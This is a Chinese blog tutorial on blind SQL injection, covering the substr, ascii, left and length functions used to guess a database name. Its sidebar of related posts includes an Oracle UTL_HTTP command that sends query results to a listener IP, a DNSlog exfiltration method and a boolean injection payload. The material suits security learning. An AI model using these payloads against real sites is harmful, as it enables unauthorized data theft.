sql 无回显盲注知识总结(一)

最新推荐文章于 2025-02-24 09:20:46 发布
原创 最新推荐文章于 2025-02-24 09:20:46 发布 · 543 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #oracle

本文介绍了盲注的概念,强调在SQL注入中获取隐藏信息的方法。通过substr函数展示如何提取字符串部分,ascii函数用于快速判断字符编码,而LEFT和length函数则用于操作数据库名,提高查询效率。

无回显盲注(一)

首先学习盲注,我们必须了解什么是盲注
盲注:根据我的理解就是,在sql注入的过程中,执行的语句不能在前端很好的显示出来,此时我们需要一些特殊的方法来获取我们所要的信息,这个过程就叫做盲注。
-------在学习之前,先掌握几个常用函数的用法:

substr函数

举个例子Micheal这个字符串,第二个参数是从地几个字符开始取,第三个参数是取多少个
Micheal这个字符串从第一个字符开始取,取一个,为M
select substr(‘Micheal’,1,1)
Micheal这个字符串从第2个字符开始取,取3个,为ich
select substr(‘Micheal’,2,3)
如果第三个参数不写,默认取到最后为icheal
select substr(‘Micheal’,2)
***举例:
通常情况下,我们查询当前数据库名

select database()

用这个函数查数据库名

select substr(database(),1,1)

ascii函数

例如:我们通常使用
select substr(database(),1,1) =“s”,在这里我们使用二十六个英文字母(包含大小写),特殊符号,挨个试进行判断,但这个结果比较漫长,因此,我们使用ascii码,将字母,符号,转换为数字,这样不仅方便,还迅速
在这里插入图片描述
在这里插入图片描述

left函数(从左往右截取)

select LEFT(‘Micheal’,3)
返回的结果为Mic

length函数(判断数据库长度)

select length(database())

NNASJ
关注
26-3 SQL入攻击 - SQL无回显又被封怎么办?
weixin_43263566的博客
03-11 1038
UNC路径的格式类似于。基于时间的可以通过构造特定的SQL语句来判断条件是否成立,从而推测出数据库中的数据。速度较慢且容易被WAF或防火墙封禁IP,因此利用DNSlog可以快速有效地获取数据,避免IP被封锁的情况。通过以上步骤,可以利用 DNSLog 平台或自行部署DNSLog来获取命令执行的回显信息,这在某些情况下可能用于安全测试或网络监控等需要的场景。需要意的是,DNS查询过程中涉及到本地DNS服务器、根DNS服务器以及顶级域名服务器等不同级别的DNS服务器,通过逐级查询最终完成域名解析。
SQL入详解
热门推荐
渗透之路,攻防之间皆学问
05-05 26万+
SQL入(SQL Injection)是种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL入-无回显】布尔:原理、函数、利用过程
06-14 9085
SQL入-无回显
无回显SQL入技巧
2201_75296969的博客
09-12 1956
就是在SQL入过程中,找到入点,执行SQL语句后,查询到的数据或者错误信息不能回显到前端页面,此时,我们需要利用些方法进行判断或者猜测,这个过程称为。布尔(Boolean Blind Injection)是种针对Web应用程序的安全攻击技术,攻击者利用应用程序的逻辑漏洞,通过构造特定的布尔表达式来判断数据库中的信息。该技术通常用于SQL入攻击中,尤其是在没有返回具体错误信息的情况下。
SQL入-无回显】时间:原理、函数、利用过程
06-14 7476
SQL入-无回显
sql无回显应用情况
weixin_74182283的博客
04-08 1699
load_file为攻击的相关函数,利用concat函数将查询的version与使用的域名包含起来,其中‘\\\\’为转义字符,可以理解为转义\,输出两个\\ ,而使用\的原因也是为了模仿UNC的路径,后面那个.xxx为域名解析,而那个test则是随便输的个文件,可以是不存在的,只是为了让查询的数据回显到dnslog上。速度很慢,有时候需要个字符去进行爆破,可以但不够高效,并且有时候防火墙还回去禁用ip,此时就可以考虑通过DNSLOG来快速的得到数据。站库分离(这是个作业,老师给的压缩包。
确认并利用 SQL 漏洞
2301_77324496的博客
11-04 364
在服务器端,sql 入和 sql 是同类型的漏洞,都是因为对输入内容不检测或检查不充分导致脏数据进入了数据库中。我们这个语的意思是猜测第个字母是不是同样的,我们把该请求发送到intruder 模块,将a设置为改变参数。1. 这个表单和上面的 sql 入表单(SQL Injection)样,输入1可以查看id为1的用户信息。15.我们的载荷列表是a-z,1-9,所合。20.下面继续猜解后面的字符。最后我们测试出来的结果是 dvwa@%,最后个%匹配的是空字符,所以用户名是 dvwa@
SQL 方法总结
junmin_lay的博客
08-14 2510
文章目录1,布尔---构造逻辑判断①left(database(),1)②ascii(substr())=n③2,报错①concat()floor(x)rand()②使用exp进行SQL报错入③bigint溢出入④xpath函数报错入 1,布尔—构造逻辑判断 ①left(database(),1) ②ascii(substr())=n ③ 2,报错 基于报错的SQL---...
以dvwa为例学习简单sql布尔的详细脚本
Lethe's Blog
03-02 2760
0x01 前置知识 1.SQL入与SQL SQL入: 执行SQL入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 般在页面上直接就会显示执行sql语句的结果 SQL般情况,执行SQL,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的般在页面上不会直接显示sql执行的结果 ...
sql入漏洞和实验
2303_81447649的博客
02-29 1717
发现不管输入什么都不管用了这个时候布尔就不适合我们了,布尔对于页面的正确和错误有不同的回显,如果页面直没有变化我们就可以用时间其实时间和布尔没有多大的差别,时间多了if和sleep()函数。在将数据存入到了数据库中之后,开发者就认为数据是可信的,在下次需要进行查询的时候,直接从数据库中取出了恶意数据,没有进行进步的检验和处理,就会造成二次入。SQL入攻击的本质,服务器没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。
和回显
2301_79880442的博客
04-15 1208
布尔型的原理就是通过逻辑运算来判断是否为真,时间型的原理就是通过判断是否有延时以此来判断逻辑运算里面的是否为真。我的理解就是时间型就是在布尔型的基础上用延时的方法来判断的。要意的是pyloud是靠and连接的,必须保证and前面的为真。
SQL入漏洞基础(三)
qq_59611876的博客
12-16 696
只要这个程序是人写的,那么定会存在SQL入的点。当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
sql入之查询方法和报错 (16)
san3144393495的博客
04-24 851
当我们进行入的时候,有很多入会出现无回显得情况,就在入的时候没有报错信息和些东西给予提示的,这种情况是无回显,在前期的入就没办法执行,我们需要他报出相关的数字,便于我们查询些参数,如果出现无回显的情况就没变过进行了。出现这个无回显的原因,可能是sql查询方式有问题所导致的, 第二个原因是对方在sql语句执行之后这个结果显示它有些显示上面的代码,他这个显示代码写的不当,不好,或者直接没写,也会导致这种无回显般结合表名和列名进行数据排序操作。会员或后台数据同步或缓存操作。
SQLI】 无回显SQL解题方法
D-river博客
02-24 1101
无回显入的核心是通过条件触发延迟或外带通道获取数据。优先尝试时间,若环境允许则结合OOB技术提升效率。编写自动化脚本并合理优化判断逻辑(如二分法)是关键。
sql
qq_52108058的博客
11-03 1169
经过对表中字段的查询发现,该admin表有三个字段,id、username、password。发现有个admin用户,在通过limit 1,1查询第二用户为空,则只有个用户。(可以理解为从数据库提取的数据被显示在前端)可以在第二个字段处显示我们想要的内容。发现的第二个字段处为。
sql入之页面不能回显(外带,Oracle)
weixin_42478365的博客
09-29 1046
很多时候页面不能直接回显,如果是oracle数据库可以用UTL_HTTP将数据反弹到个外网IP进行查看,具体步骤,如下: 第步:使用nc监听数据 nc -lvvp 8888 第二步:反弹数据信息 and UTL_HTTP("http://IP:8888/" || (SQL语句))=1-- 判断是否存在UTL_HTTP select count(*) from all_objects where object_name="UTL_HTTP" ...
SQL入(MySQL查询语句、URL编码、无回显
诚邀网络通信领域商务合作
01-05 2289
文章目录MySQL常用查询语句释URL编码 MySQL常用查询语句 select user(); 当前MySQL 登录用户名 select database(); 当前MySQL 数据库名 select version(); 当前MySQL 版本 select @@version; 当前MySQL 版本 select @@basedir; 当前MySQL 安装路径(MySQL安装目录) select(length..
SQL入-
m0_52149675的博客
04-02 1488
当进行SQL入时,有很多入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或进行后续操作,同时作为手工入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的入语句。
WEB漏洞-SQL入之查询方式及报错
weixin_46425310的博客
06-12 331
WEB漏洞-SQL入之查询方式及报错 当进行SQL入时,常常会遇到无回显的情况,不回显可能是因为SQL语句的查询方式的问题,这时候需要用到报错或进行后续操作,在手工入时,最好提前预知SQL语句的写法。 查询方式:增删查改 INSERT SELECT DELETE UPDATE 分为以下三类: 布尔-逻辑判断 ?id=1’+and+left((select+database()),2)=‘se’–+ 时间-延时判断 if,sleep mid(a,b,c) 从位置b开始,截取a字符串的
布尔知识点笔记
最新发布
11-10
</think>### CTFHub技能树布尔知识点笔记 布尔SQL入的核心技术之,适用于**无显错位、无数据回显但存在真假响应差异**的场景(如页面内容变化、HTTP状态码改变等)。以下是系统化总结: --- ####...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值